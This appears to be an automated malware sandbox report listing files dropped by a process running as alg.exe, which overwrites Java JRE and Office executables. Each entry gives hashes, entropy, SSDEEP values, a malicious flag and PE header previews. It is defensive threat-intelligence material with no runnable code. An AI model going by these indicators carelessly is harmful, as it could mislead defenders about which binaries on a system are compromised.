                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1242112
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.172681067057672
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:xYdP/QXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:edP/QsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:5DAD04531C6A4DC339CC83ACCE6045BF
                                                                                                                                                                                                                                                                                                                                                    SHA1:1E6F2631B6A96665859EE0AD97D4D33E66B7D46C
                                                                                                                                                                                                                                                                                                                                                    SHA-256:B63C5322E4A41BA2044476202E348D7D1392D361876B223330268550E6DFB167
                                                                                                                                                                                                                                                                                                                                                    SHA-512:8EFEAD167ED14FED341C2661573E113DFFCE8C7F6C3276F7EF4972CA1B0FB0CB5BAE4DCA67BE411BEB98D10AF4E2EFEE8839DE6E5CF9186E8DA7C5DB14568EA7
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P......CD..........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032912108331779
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:5y5TXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cpsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:A858EB6376D480148A752287EE9217ED
                                                                                                                                                                                                                                                                                                                                                    SHA1:5102F2F7B726203B4BAE09328493327FC7F597AD
                                                                                                                                                                                                                                                                                                                                                    SHA-256:76B4093B278D5D93A1A233CE9C56A8C9C2D4DD5A5615F3D715CC67929BA28678
                                                                                                                                                                                                                                                                                                                                                    SHA-512:E0A787EC16C5A8B05087A918C8FDD80D81E09762DCC50247753281CC2385B5CB681046796BBC651F23AD4465BBD17F64ED64F7D4A74D98404F4164FC89BD75F4
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................>........................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032979669797963
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:JKlLXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:YFsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:B268749E72D29F274F99A9A781EDEB1D
                                                                                                                                                                                                                                                                                                                                                    SHA1:5D6504F4C4B21CCFE59DE84A1DF738A2907E21D6
                                                                                                                                                                                                                                                                                                                                                    SHA-256:940174DC9881D7D9496994F7FB15032383C8A3E0FCA21224201F6ED149C53135
                                                                                                                                                                                                                                                                                                                                                    SHA-512:1F7B4D069454BE085615633E22F8BB5A08A3DD7F57909EA53C403B7A12EC0C5A623D56A68E96D5A0523B8761AD9758B00B8081F4B6EBBD07F79D6AAFC62AE71A
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032983290656
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:FilLXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IFsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:F9FD989EC4DAF6B05B3EB6B54AC2A14F
                                                                                                                                                                                                                                                                                                                                                    SHA1:93CFDB7DF4F2FA408D6280157AFD324683A2811C
                                                                                                                                                                                                                                                                                                                                                    SHA-256:A6923DA145C8516B2133156263DEEC084D58D185BF72965295A9E67D4D9C4F35
                                                                                                                                                                                                                                                                                                                                                    SHA-512:1D59848CAE4464DEF9E33A83296D0B98CF137A4ADAEAC11BEEBEAFE40F787D993ED6999D76DAFB356068F944E96FA487956A2F7D0DCC9EAABCA528AEB844A1D6
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................o.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0329526054537155
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:wTmrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:KCsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:9581AF876FF5113820CE462FE6E705B4
                                                                                                                                                                                                                                                                                                                                                    SHA1:EB25378D86F2A0F3D7B51B0109081E84BFF1207C
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F35D2F2AFFD9A8A4396679327E263E448B40E234458B337ADB2E4AE4923F0ADF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2EE7A54E5D01DC557CFF7399A6DC15F96FC7E48236D6BE40F8130712D3D6A8DA8B2F0831A12784902068E6B1E198DD59CCDC752C789D8D389D30440D78A5E68
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................)a.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.033869410815547
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:LamXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:2GsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:21369ECA39B48E612D55FCBA1A9A1906
                                                                                                                                                                                                                                                                                                                                                    SHA1:A5DF2FA20E9E8B294176D17FA8AC4621E5748FDB
                                                                                                                                                                                                                                                                                                                                                    SHA-256:0F8E574432183B3DAB133C7E75E6760FD4671E0C2B80BFC8F042E0F8936D0441
                                                                                                                                                                                                                                                                                                                                                    SHA-512:700EEC62F3C1E957F9E324E91D3C33CD745B3D09DBF8D715A507667A5F143912FD1D65AFE9705D1986ADEAE13E2B7AE682C5BE1FA80DD61F7CDEAFC8855392F0
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032934159378806
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:5Q5TXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:qxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:99F99E538C47BE6071EC4AB42EB1CDDD
                                                                                                                                                                                                                                                                                                                                                    SHA1:3D71F30CC38F21C5EBD9BEB32211E9F32FE80187
                                                                                                                                                                                                                                                                                                                                                    SHA-256:647BAD78C2A7183BBCCF5630FCD164F60106490B7ACE03B8DBB9FA18739D5E32
                                                                                                                                                                                                                                                                                                                                                    SHA-512:815CA69496037FB8B302F7394765BD4E2B254D1E32CCD244224D7289D6C9172DACCA18B52765B652F0A1D36E5B62D289C1E78B6DB01029F202C70328E8EE8E7F
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................b.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032964681942894
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:MV/LXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:26C4063973C58EB5D88275FEABE99D12
                                                                                                                                                                                                                                                                                                                                                    SHA1:6C9B164C8070E5A92304264FBB8BC932D6030E0E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:3B193A2D22684A54EE1B16EA7265780D06DE23EA5143B7C68CA329C6A4F4EF13
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C28D05ADBB44527301C7CC2D625F4C059FBEB8A5BB338FB692249496ED54843EDF3D0BC004843A61EB26879B15F25E2694B4EA258021F4904AC11B6F05E415E6
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032871647008201
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:BZm7Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:vCsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:C2B07382D9A4FBC888C64AE9105957ED
                                                                                                                                                                                                                                                                                                                                                    SHA1:C431F92CE40BA57C12CF51E966293A55212625B3
                                                                                                                                                                                                                                                                                                                                                    SHA-256:CF1946B57EC4012A9279AAE0FB1EF9C6E0DFBAE97E8E196B40340017D5F3D610
                                                                                                                                                                                                                                                                                                                                                    SHA-512:745CA871BF5B204C86CE7A9941F9B48CF580222FA2CF9986DDBA6AF3E8249A6F155FC020D16C6F94ACED4C5B0FFEB98A7311D8D4B45B904F75B3B6616DFEF031
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032921905773895
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:1eSzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:0+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:936AADA5DF36C17C9704A1DB6456139C
                                                                                                                                                                                                                                                                                                                                                    SHA1:1BA6599E0FAE1288892DEA894A2FD853BDAED4C0
                                                                                                                                                                                                                                                                                                                                                    SHA-256:793701CF4B14A1118FB0035283A9A3ABB26A86A5A9603C30A137C5F91D310CDD
                                                                                                                                                                                                                                                                                                                                                    SHA-512:4664F635C856D5D0B49BD20C789852CC52C90433C0C374E26853EBB57D8796F3F48D428017734251103891E6DEF0BAD568CB25D80106768E6C4423A0C09535CB
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032983967195052
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:l5/LXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:39C5CE09F55A5654A44FD5DDA6F3EBD2
                                                                                                                                                                                                                                                                                                                                                    SHA1:50C96C3E82F43CCCAF315A14E5A32EF57D972ABB
                                                                                                                                                                                                                                                                                                                                                    SHA-256:7CA295E5FA80AB7186CC3853A9DF17090BD47ABEADEF70206468E05866926B3F
                                                                                                                                                                                                                                                                                                                                                    SHA-512:082F89147BEA78F7232E5EED7803206FDC41B85ED9C2A44B6597664BAA6448DE7DFD5D7EC898AB6063278FA79D7A72BEF447085CCE5DEBAA01C58BE37321ECD6
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................r.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1202688
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.098063769140422
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:37RXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:37RsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:B88BBC883C96E5802BFB43E563619D4C
                                                                                                                                                                                                                                                                                                                                                    SHA1:2ADD3B76B9DFED8CCD143F767DCF4FF829CF8AEF
                                                                                                                                                                                                                                                                                                                                                    SHA-256:CC113B4C4348BC04BED7FC2C9798A6252E7B72E1606A635B47270C0D7C1CD326
                                                                                                                                                                                                                                                                                                                                                    SHA-512:E3E5340CD5CA2302736987E7E127651EF3E40E83C9846EDBA9049B8C035FC87AF93D10C1B5C8CCD61A8A0FC4E824B82294EBEA41B86208216624AF62D258EE8D
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.............................................................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142784
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.03231867663766
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:BKQnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:AMsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:9D9DE7B04C4903E8E49567569A62C5D7
                                                                                                                                                                                                                                                                                                                                                    SHA1:DDBF6F462C7F7DEF039BD81D66160E310D091202
                                                                                                                                                                                                                                                                                                                                                    SHA-256:510C9011F26E7EF240EEA340A7621BC2FA22A3AE3800AB2A27C5DC6C96DDCBEB
                                                                                                                                                                                                                                                                                                                                                    SHA-512:258FC635C869E67F8F78B0639871D9BEEC72F10B9CBA18555F9228E3A20D65E75A7F671234AA2507B9B2DB94AB317B21877E018FFDB3497091358DD989F719D3
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................................................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1298944
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.249095325295319
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:bi7l/3roAVsqjnhMgeiCl7G0nehbGZpbD:Wl/roAJDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:DECACC8153F8CC83E2D539B378CB1A08
                                                                                                                                                                                                                                                                                                                                                    SHA1:6A6D9064A6D19FEC6575FFEF1E5083D9347C41F1
                                                                                                                                                                                                                                                                                                                                                    SHA-256:DEADAA374395E955576E2BFAB5A0AD813F8EB6710ECF6C1F8C9EBADE773EE7E9
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D65AD835B040AEB97CE414ACC314F7C887ED546A0A2903E68595F655D363977AE83C4F7859AFA0B315474F48E25BEA6C72510D4F7BF8D45063888D16D6A30489
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0..........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1269248
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.286884600713318
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:J5bfQnJXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JNfQnJsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:A229B7C6DA3048DC61063EA9B3D742DD
                                                                                                                                                                                                                                                                                                                                                    SHA1:EC8A3F5E49667DCEEB9C75FA954672810F3C3300
